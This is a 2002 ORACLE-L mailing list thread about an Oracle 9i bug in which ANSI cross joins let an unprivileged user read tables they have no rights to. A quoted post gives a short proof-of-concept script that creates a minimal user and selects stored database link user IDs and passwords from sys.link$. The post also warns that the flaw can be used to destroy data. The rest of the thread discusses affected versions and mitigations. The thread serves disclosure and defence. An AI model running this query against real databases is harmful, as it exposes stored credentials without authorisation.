No , the user did not have access to link$. But that's the point. The bug allows the user access to table he/she doesn't have access to when used with a cross join.
> -----Original Message-----
> From: Hately Mike [mailto:Mike.Hately_at_churchill.com]
> Sent: Tuesday, April 16, 2002 11:39 AM
> To: Multiple recipients of list ORACLE-L
> Subject: RE: Security Hole
>
>
> Glenn,
> did the user have access to LINK$. It's common practice to
> restrict access
> to that table.
>
> Cheers,
> Mike
>
> -----Original Message-----
> Sent: Tuesday, April 16, 2002 3:39 PM
> To: Multiple recipients of list ORACLE-L
>
>
> It appeared in 9i and is fixed in 9.2.
> 8i is not affected as it does not have cross joins.
>
> From Metalink Note 137286.1;
>
> Oracle9i introduces the following SQL:1999-compliant joins:
>
> 1.1 CROSS Join
> 1.2 NATURAL Join
> 1.3 OUTER Join
> 1.3.1 LEFT OUTER Join
> 1.3.2 RIGHT OUTER Join
> 1.3.3 FULL OUTER Join
>
>
> 1.1 CROSS Join
> --------------
>
> A CROSS join is the cross-product of two tables. It is the
> equivalent of a
> Cartesian product.
> -----------------------
>
> I tried the query with a cartesian product in 8i and it didn't work.
>
> select userid,password from sys.link$, dual
> *
> ERROR at line 1:
> ORA-00942: table or view does not exist
>
>
> > -----Original Message-----
> > From: Ruth Gramolini [mailto:rgramolini_at_tax.state.vt.us]
> > Sent: Tuesday, April 16, 2002 8:38 AM
> > To: Multiple recipients of list ORACLE-L
> > Subject: Re: Security Hole
> >
> >
> > Is this on 9i databases or is 8 involved? Ruth
> > ----- Original Message -----
> > To: "Multiple recipients of list ORACLE-L" <ORACLE-L_at_fatcity.com>
> > Sent: Tuesday, April 16, 2002 7:33 AM
> >
> >
> > > This just in from comp.databases.oracle.server.
> > >
> > > See metalink bug 2121935.
> > >
> > > Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)
> > > allows you to view data from tables on which you have no
> > > privilege. For example, try this COMPLETE script:
> > >
> > > connect / as sysdba
> > > create user us1 identified by us1;
> > > grant create session to us1;
> > >
> > > connect us1/us1
> > >
> > > select userid, password
> > > from
> > > sys.link$ cross join dual
> > > ;
> > >
> > >
> > >
> > > Worse still, if you have the privilege to create views
> > > then this loophole allows you to seek and destroy
> > > ANY DATA in the database that you might want to.
> > >
> > > The bug is fixed in 9iR2. I didn't see any note
> > > about a backport, or a security alert on OTN.
> > >
> > > Conclusion:
> > >
> > > 9.0.1 should not be in use on production system
> > > until Oracle supplies a fix.
> > >
> > >
> > >
> > > Jonathan Lewis
> > > http://www.jlcomp.demon.co.uk
> > >
> > > Author of:
> > > Practical Oracle 8i: Building Efficient Databases
> > >
> > > Next Seminar - Australia - July/August
> > > http://www.jlcomp.demon.co.uk/seminar.html
> > >
> > > Host to The Co-Operative Oracle Users' FAQ
> > > http://www.jlcomp.demon.co.uk/faq/ind_faq.html
> > >
> > >
> > >
> > >
> > > --
> > > Please see the official ORACLE-L FAQ: http://www.orafaq.com
> > > --
> > > Author: Jonathan Lewis
> > > INET: jonathan_at_jlcomp.demon.co.uk
> > >
> > > Fat City Network Services -- (858) 538-5051 FAX:
> (858) 538-5051
> > > San Diego, California -- Public Internet access /
> > Mailing Lists
> > >
> --------------------------------------------------------------------
> > > To REMOVE yourself from this mailing list, send an E-Mail message
> > > to: ListGuru_at_fatcity.com (note EXACT spelling of
> 'ListGuru') and in
> > > the message BODY, include a line containing: UNSUB ORACLE-L
> > > (or the name of mailing list you want to be removed
> from). You may
> > > also send the HELP command for other information (like
> subscribing).
> >
> > --
> > Please see the official ORACLE-L FAQ: http://www.orafaq.com
> > --
> > Author: Ruth Gramolini
> > INET: rgramolini_at_tax.state.vt.us
> >
> > Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> > San Diego, California -- Public Internet access /
> Mailing Lists
> > --------------------------------------------------------------------
> > To REMOVE yourself from this mailing list, send an E-Mail message
> > to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> > the message BODY, include a line containing: UNSUB ORACLE-L
> > (or the name of mailing list you want to be removed from). You may
> > also send the HELP command for other information (like subscribing).
> >
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author: Glenn Travis
> INET: Glenn.Travis_at_sas.com
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
>
>
>
> ______________________________________________________________
> ______________
> ________________________
>
> This email and any attached to it are confidential and
> intended only for the
> individual or
> entity to which it is addressed. If you are not the intended
> recipient,
> please let us know
> by telephoning or emailing the sender. You should also
> delete the email and
> any attachment
> from your systems and should not copy the email or any attachment or
> disclose their content
> to any other person or entity. The views expressed here are
> not necessarily
> those of
> Churchill Insurance Group plc or its affiliates or
> subsidiaries. Thank you.
> Churchill Insurance Group plc. Company Registration Number - 2280426.
> England.
> Registered Office: Churchill Court, Westmoreland Road,
> Bromley, Kent BR1
> 1DP.
>
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author: Hately Mike
> INET: Mike.Hately_at_churchill.com
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
>
--
Please see the official ORACLE-L FAQ: http://www.orafaq.com
--
Author: Glenn Travis
INET: Glenn.Travis_at_sas.com
Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
San Diego, California -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from). You may
also send the HELP command for other information (like subscribing).
Received on Tue Apr 16 2002 - 11:19:03 CDT
